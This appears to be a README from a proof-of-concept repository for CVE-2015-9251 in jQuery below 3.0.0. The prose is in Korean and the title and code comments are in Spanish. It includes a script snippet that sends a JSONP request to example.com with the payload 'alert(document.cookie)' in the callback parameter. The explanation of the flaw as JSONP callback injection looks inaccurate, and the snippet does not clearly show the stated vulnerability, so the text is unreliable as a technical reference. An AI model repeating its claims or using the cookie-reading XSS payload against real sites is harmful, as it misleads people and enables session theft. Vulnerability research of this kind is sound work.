
PoC para CVE-2015-9251 jQuery menor a 3.0.0.
CVE-2015-9251 및 jQuery 3.0.0 미만 버전에 대한 PoC.
이 저장소는 jQuery 라이브러리의 취약점 CVE-2015-9251에 대한 **Proof of Concept (PoC)**을 포함합니다. 이 취약점은 jQuery 3.0.0 미만 버전에서 callback 매개변수에 코드 삽입을 허용하여, 위생 처리되지 않은 JSONP 호출을 통한 크로스 사이트 스크립팅(XSS) 공격을 가능하게 합니다.
CVE-2015-9251은 jQuery 3.0.0 이전 버전에 영향을 미칩니다. 이 취약점은 JSONP 요청에서 callback 매개변수를 조작하여 악용되며, 피해자의 브라우저에서 임의의 JavaScript 코드가 실행될 수 있습니다. 이로 인해 세션 쿠키와 같은 민감한 데이터가 노출될 수 있습니다.
PoC를 실행하려면 다음 단계를 따르세요:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>